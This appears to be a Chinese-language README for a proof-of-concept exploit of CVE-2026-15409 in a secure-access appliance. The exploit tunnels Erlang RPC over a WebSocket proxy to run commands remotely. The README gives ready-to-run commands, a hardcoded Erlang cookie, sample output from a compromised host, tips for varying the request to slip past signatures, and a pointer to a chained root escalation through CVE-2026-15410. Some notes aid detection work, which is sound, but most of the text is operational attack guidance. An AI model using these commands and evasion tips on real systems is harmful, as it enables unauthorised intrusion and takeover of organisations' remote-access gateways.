CVE-2026-15409
本仓库包含CVE-2026-15409的概念验证漏洞利用。它通过实现localhost:1050预期的Erlang协议,并通过WebSocket进行隧道传输,利用RPC调用来实现非root远程代码执行,支持文件读写及任意代码执行。
使用方法
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
已认证到 [email protected]
对等标志:0xd07df7fbd
对等创建时间:1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma
利用与检测说明
- 此漏洞利用针对WorkPlace服务(通常监听443端口),该服务几乎始终启用(需要设置用户认证方式,如基本AD)
- 基于ex_sra_vm_12.5.0-02002.ova开发,已应用2026年6月热修复(补丁前的最新版本)
- 示例:python3 cve-2026-15409.py --ws-url 'wss://TARGET_IP_HERE/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'touch /var/tmp/remote_code_execution'
- 用于利用的Erlang节点cookie应在不同目标上保持一致;根据测试,该cookie对于localhost:1050上的Erlang进程是硬编码的。
- 只要bmID值以"-3389"开头,通常任意bmID都可以使用。不要针对"serviceType=SSH"编写签名,因为TELNET等其他替代方案同样有效。0.0.0.0也可以替换为其他地址格式。
- 端口1050是一种利用技术,并非硬性要求。在野攻击中也观察到针对端口8188的情况,不过使用1050似乎更简便。可能还有其他不同端口的服务也可被利用。由于技术变化,野外代码执行很可能发生在couchdb之外的其他用户上下文中。
- 攻击者一旦建立Shell,可以利用"remove hotfix" XMLRPC遍历漏洞CVE-2026-15410(针对localhost:8188)将权限提升至root。